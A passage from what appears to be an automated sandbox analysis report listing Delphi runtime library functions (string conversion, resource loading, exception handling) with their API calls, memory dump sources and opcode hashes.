                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@System@%$FromUnicode$Str$qqrr20Stringx27T$us$i0$%$Clr$qqrpvInternalRecx27Str$qqrr27String$qqrr15StringusT$us$i0$%iT$us$i0$%x20TextWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1770171856-0
                                                                                                  • Opcode ID: f3822a6ceb7ea1d4ed5306455a56ddfc370fb437e991b2596a5427501aefc0ed
                                                                                                  • Instruction ID: b5ddcc7ba318723b074cea580f7c3f422d4a35a63fcd16844832d78ca229e7f9
                                                                                                  • Opcode Fuzzy Hash: f3822a6ceb7ea1d4ed5306455a56ddfc370fb437e991b2596a5427501aefc0ed
                                                                                                  • Instruction Fuzzy Hash: 22117030B052889FEB10CFB8D9A159EB7F9EF49200FA046B6E504D3291EB30DF01D681
                                                                                                  Function 50026D6C Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026E08), ref: 50026D9A
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50026E08), ref: 50026DA9
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000002,?,00000000,50026E08), ref: 50026DD4
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000002,?,00000000,50026E08), ref: 50026DE3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringUnicode$LoadString$qqrp20$Asg$qqrr20Exception@$bctr$qqrx20RecxiStringpx14Stringx20System@@Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 619835585-0
                                                                                                  • Opcode ID: 769a27d334da4fa175056a5810ce234115566d59187558c35d95f8a1f00c0ffa
                                                                                                  • Instruction ID: a7982feb311dfa74fab4dc917654063223abea63f5cd1ec45e59986a5486330b
                                                                                                  • Opcode Fuzzy Hash: 769a27d334da4fa175056a5810ce234115566d59187558c35d95f8a1f00c0ffa
                                                                                                  • Instruction Fuzzy Hash: DD114C309056899FDB10CFA9DC919DEB7F8EB58200F90456AE900A3251E7B49E05CBA1
                                                                                                  Function 50021A30 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021ACE), ref: 50021A70
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021ACE), ref: 50021A92
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1rx24Sysutils@TFormatSettings.RTL120(?,00000000,00000000,50021ACE), ref: 50021AA4
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021ACE), ref: 50021AB3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$FromStringSysutils@$AnsiFloatStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20FormatInternalLen$qqrr20SettingsStringpbiTextValuet1rx24
                                                                                                  • String ID:
                                                                                                  • API String ID: 450212489-0
                                                                                                  • Opcode ID: a3dcc1f81dabbd884260d5728da179efc1f7e6ee7e262f411babcf95e230f245
                                                                                                  • Instruction ID: 6c94864ea6d5d124ea52cca348c6ec8d64ebc88412d021a3ebff09329b69cbe3
                                                                                                  • Opcode Fuzzy Hash: a3dcc1f81dabbd884260d5728da179efc1f7e6ee7e262f411babcf95e230f245
                                                                                                  • Instruction Fuzzy Hash: B111523060228AAFEF11DBA8ED5299EB7F9DF54200F544662F505D7251EB70DF40C691
                                                                                                  Function 50021B88 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021C26), ref: 50021BC8
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021C26), ref: 50021BEA
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1rx24Sysutils@TFormatSettings.RTL120(?,00000000,00000000,50021C26), ref: 50021BFC
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021C26), ref: 50021C0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$FromStringSysutils@$AnsiFloatStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20FormatInternalLen$qqrr20SettingsStringpbiTextValuet1rx24
                                                                                                  • String ID:
                                                                                                  • API String ID: 450212489-0
                                                                                                  • Opcode ID: 506c4d0157f470223a45ebc515c374535dd304c8f2841ec6c2185e66518a86b7
                                                                                                  • Instruction ID: be0ce3d10ad342f317ac9f6b3525fc43e20e2d4a1a282cb9314027698d09642a
                                                                                                  • Opcode Fuzzy Hash: 506c4d0157f470223a45ebc515c374535dd304c8f2841ec6c2185e66518a86b7
                                                                                                  • Instruction Fuzzy Hash: 8B11827460128A9FDF11DBA8ED518DEB3F9EF54200F644AA2E900D3651EB709F40C6D0
                                                                                                  Function 5002F438 Relevance: 9.1, APIs: 6, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$String$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Exception@$bctr$qqrx20Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 719264781-0
                                                                                                  • Opcode ID: 82279774022d7fecd5dde7ff4b3fe3bf96aa76689d9b5b35dc22427500a0355b
                                                                                                  • Instruction ID: a2645b7ded7df6c6dd4538b9128dd2fe1d0b1c7c9240a696d069f83c6a480ba7
                                                                                                  • Opcode Fuzzy Hash: 82279774022d7fecd5dde7ff4b3fe3bf96aa76689d9b5b35dc22427500a0355b
                                                                                                  • Instruction Fuzzy Hash: 1D117030901649AFDB10DFE9D8926AEBBB9EF99250F91427AE40493281DB749E008A91
                                                                                                  Function 50021988 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021A22), ref: 500219C5
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021A22), ref: 500219E7
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021A22), ref: 500219F8
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021A22), ref: 50021A07
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$FromString$AnsiFloatStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20InternalLen$qqrr20StringpbiTextValuet1
                                                                                                  • String ID:
                                                                                                  • API String ID: 220105677-0
                                                                                                  • Opcode ID: 006bfad56634e30e1ede2951a2f55d569cdaa5b11a793d97a35f32b4fbe24263
                                                                                                  • Instruction ID: 036d74904adcca26afda292c117eb6ff0a0a240ba8c665c9ccc47f17789f53e3
                                                                                                  • Opcode Fuzzy Hash: 006bfad56634e30e1ede2951a2f55d569cdaa5b11a793d97a35f32b4fbe24263
                                                                                                  • Instruction Fuzzy Hash: 9D115E3061128A9BDF11DBA4E9629DEB7F9EF58200F944672E505D7651EB30EF40CA80
                                                                                                  Function 50021AE0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021B7A), ref: 50021B1D
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021B7A), ref: 50021B3F
                                                                                                  • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021B7A), ref: 50021B50
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021B7A), ref: 50021B5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$FromString$AnsiFloatStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20InternalLen$qqrr20StringpbiTextValuet1
                                                                                                  • String ID:
                                                                                                  • API String ID: 220105677-0
                                                                                                  • Opcode ID: 10de996a424494fadf64891ef00ac74fcb95426f62f90a68df844ebbb861240a
                                                                                                  • Instruction ID: 22b3bb944ed5e654b16ecdf05b6840fd4d7b345ebaa55648a236dabb6c7033cf
                                                                                                  • Opcode Fuzzy Hash: 10de996a424494fadf64891ef00ac74fcb95426f62f90a68df844ebbb861240a
                                                                                                  • Instruction Fuzzy Hash: A7115E3060128A9FDF12DFA4ED5299EB7F9EB64200F9446A2E505D7252EB309F448690
                                                                                                  Function 50027254 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                  • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                  • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                  • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                  • @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                  • @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Except$Object$qqrv$Addr$qqrvClassClass$qqrp14Free$qqrvMetaObject@Objectp17System@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3884317974-0
                                                                                                  • Opcode ID: 67d9d523dcd6260564ebb45294177d8fdd426f7379c81a39e08137fce02da52f
                                                                                                  • Instruction ID: e6ed14f667667660170ac11691c6c759c670658a77a7e2590363da686ae2756a
                                                                                                  • Opcode Fuzzy Hash: 67d9d523dcd6260564ebb45294177d8fdd426f7379c81a39e08137fce02da52f
                                                                                                  • Instruction Fuzzy Hash: DF112870606A81CFF365CF7AED42661B7F1EFAD314B418169E408CB635DA30D881CB60
                                                                                                  Function 50030760 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003078A
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003079E
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,500307EF), ref: 500307BB
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,500307EF), ref: 500307CA
                                                                                                    • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                    • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                    • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500307EF), ref: 500307CF
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$StringStringx20$Asg$qqrr20$Cat3$qqrr20LoadRaiseRecxiStringpx14Stringt2Sysutils@Text$qqrxusTypeVariants@$CharClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceString$qqrp20Stringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2913030950-0
                                                                                                  • Opcode ID: 6f4298eec964639a3ff7582bf64e84ce53078f507fa9f13c27cd35f1816d1073
                                                                                                  • Instruction ID: 52d32d863b0f2654399b17d17a4284c2ace4cc9aa2092407aa442c0c846a789d
                                                                                                  • Opcode Fuzzy Hash: 6f4298eec964639a3ff7582bf64e84ce53078f507fa9f13c27cd35f1816d1073
                                                                                                  • Instruction Fuzzy Hash: 8C117C74D0524A8FDB05CFA8ECA19EFB7B9EB48300F50856AE904E3341D7745A01CAE1
                                                                                                  Function 500308A4 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308CE
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                    • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030933), ref: 500308E2
                                                                                                    • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030933), ref: 500308FF
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030933), ref: 5003090E
                                                                                                    • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                    • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                    • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030933), ref: 50030913
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
